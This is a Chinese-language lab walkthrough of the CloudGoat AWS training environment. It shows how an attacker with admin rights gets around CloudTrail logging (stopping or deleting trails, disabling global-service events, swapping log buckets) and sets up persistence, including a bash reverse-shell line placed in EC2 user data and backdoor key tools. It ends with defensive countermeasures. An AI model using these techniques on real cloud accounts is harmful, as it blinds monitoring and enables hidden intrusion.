CloudGoat云靶机 Part-2:绕过CloudTrail实现持久访问

在第一篇文章中,我分享了一个AWS提权实例:从一个仅有EC2权限的账户提权至管理员权限。今天,我将继续本系列,向大家展示如何绕过监控系统和如何实现持久访问。

CloudTrail

CloudTrail服务会监控所有的AWS活动。亚马逊是这样介绍它的:

“AWS CloudTrail 是一项 AWS 服务,可帮助对您的 AWS 账户进行监管、合规性检查、操作审核和风险审核。用户、角色或 AWS 服务执行的操作将记录为 CloudTrail 中的事件。事件包括在 AWS 管理控制台、AWS Command Line Interface 和 AWS 开发工具包和 API 中执行的操作。简化了安全性分析,资源更改检测,故障排除等过程。”

换句话说,CloudTrail是个“老大哥”,监视着用户的所有行为。很显然,攻击者拿下一个脆弱的环境后,第一件事就是绕过检测系统,清除痕迹。如果攻击者拿下了管理员权限,实现这些并不是不可能的。

了解配置

CloudTrail服务默认是关闭的,管理员可以配置它。你可以设置“trails”来自定义监视的内容。

回到CloudGoat平台,让我们来看看CloudTrail监视的范围。

可以看到,所有的日志文件都存储在一个名为“8678170722044418295491212493322823229141751439696325418”的S3储存桶中。还有CloudGoat中的CloudTrail仅监视了“us-west-2”区域。所以我们可以开展区域外的行动了,比如我们创建在其他区域创建一个新实例,这并不会被CloudTrail监控到。还有一点,请注意,使用全球服务将会被记录下来,像“IAM”(比如创建一个备用账户)。那么,攻击者如何绕过CloudTrail监控服务?

中止服务

首先,所有的入侵者都会想到这点。暂停服务用以下简单的命令实现:

然后,攻击者可能会执行一些有害操作(例如窃取数据,创建IAM备用账户,创建新实例用于挖矿)。完成攻击后,可以以下命令启动CloudTrail:

$ aws cloudtrail start-logging --name cloudgoat_trail --profile administrator

删除trails

通过删除所有trail也可以中止CloudTrail服务:

$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator

或者,你移除存储日志信息的储存桶也可以做到(你过你那么做,记住添加一个force标签,否则你即使有管理员权限也无法删除储存桶)

在删除trails或者储存桶后,CloudTrail将处于宕机状态。还有一点,这两个方法有点高调,因为CloudTrail中会有最终的回显。例如当你删除了储存桶后,CloudTrail会有这样的提示:

GuardDuty(另一个监控服务)也会对CloudTrail服务的异常状态发出警报:

更好的方法

如果开启了CloudTrail,它默认监视所有区域。然而我们的CloudGoat平台中仅监视“us-west-2” 区域,所以我们可以在其他区域创建EC2实例,而不用担心被监控到。

对于全球服务,前面已经说过了,任何操作都会被监控到。幸运的是,你可以用标签include-global-service-events关闭全球服务中的事件监视。为了验证是否有效,我创建了一个用户“test1”,然后关闭了全球服务事件监视:

然后我创建了用户“test2”:

我用Bob的密钥暂停了EC2实例(检查“us-west-2”的所有事件是否正确记录)。在CloudTrail中,可以看到这里有记录”test1“用户的创建,而没有”test2“的记录:

用这种方法,攻击者可以绕过CloudTrail服务的监视。还有其他的方法避免被CloudTrail记录:

  1. 使用新密钥加密所有日志(禁用该密钥,一段时间后删除)
  2. 使用新的S3储存桶(攻击者完成删除它,然后再换回原先的储存桶)。
  3. 使用AWS Lambda拒绝新日志记录(不需要更改CloudTrail的trails配置,你只需要这些权限“iam:CreatePolicy”, “iam:AttachRolePolicy”, “lambda:CreateFunction”, “lambda:AddPermission”, “s3:PutBucketNotification”)

如果这些方法不切合实际情况,Daniel Grzelak的一篇文章可能会帮到你。

需要注意的是,以上所有方法虽然可以避免CloudTrail日志被记录到储存桶中,但是所有的操作还是会CloudTrail事件系统储存90天。包括所有区域的事件都会被储存且无法关闭存储系统。这里你可以了解详情。

 

持久访问

在获取管理员权限,并且知道如何绕过CloudTrail监视器后,那么是时候在该环境实现持久访问了。有很多方法可以在该环境下留下后门,比如:

  1. 用高权限账户修改用户数据(使用bash命令bash -i >& /dev/tcp/[your_ip]/[your_port] 0>&1或者获取SSH密钥认证)
  2. 添加AMI备用账户后,用它创建新EC2实例
  3. 在Lambda函数中添加后门(比如,某个参数调用该函数后导致创建一个新用户)

较好的方法是给现有的用户分配额外的密钥,aws pwn可以帮助你做到这点。然而aws pwn还可以帮助你自动化地完成很多事:

  1. rabbit_lambda—  Lambda函数,可以不断地删除某个用户再创建它,实现干扰删除用户的事件记录系统。
  2. cli_lambda —  Lanmbda函数,可以无需凭证创建AWS CLI代理
  3. backdoor_created_users_lambda — Lambda函数,可以给新用户添加密钥
  4. backdoor_created_roles_lambda — Lambda函数,给新用户之间添加信任关系
  5. backdoor_created_security_groups_lambda— Lambda函数,把新入站规则应用到所有安全组
  6. backdoor_all_users— 可以给账户中的用户添加密钥
  7. backdoor_all_roles — 可以给所有用户之间添加信任关系(设置ARN

让我们回到CloudGoat平台环境,给所有用户添加密钥:

好的,现在所有用户都有两个密钥了。我们可以再AWS管理中心看到:

有趣的是,用户不会收到添加密钥的通知。对于CloudTrail来说,因为关闭了全球服务事件的通知,所以不会有日志记录。那么,GuardDuty(AWS监控系统)会有什么不同?

Amazon是这样描述GuardDuty服务的“
Amazon GuardDuty 是一种智能威胁检测服务,帮助保护您的 AWS 账户和工作负载。”

所以,它不会把有权限地IAM用户正常创建新密钥识别为异常活动:

 

应对措施

这篇文章介绍了绕过CloudTrail监视系统和如何实现持久访问。你应该发现了,这不是一项艰巨的任务。那么,我们该如何防止这些东西发生呢?

  1. 启用CloudTrail日志完整性保护,以防止攻击者替换日志的S3储存桶。
  2. 除了极少数需要使用它的用户(遵循最小权限原则,Netflix的Repokid可以快速地帮助你),删除所有用户的CloudTrail管理权限(有助于防止攻击者提权,这里可以帮助你)
  3. 设置其他AWS账户管理CloudTrail S3储存桶的跨区域复制权限。即使主账户的AWS环境被攻击者入侵,CloudTrail日志也无法更改。
  4. 启用MFA删除保护,增加了删除储存桶内容的难度。
  5. 使用其他公司的服务备份CloudTrail日志(例如: Splunk)。
  6. 启用多种监视器,比如AWS AWS CloudWatch Events, 外部服务:Cloudsploit Events , CloudTrail Listener
(完)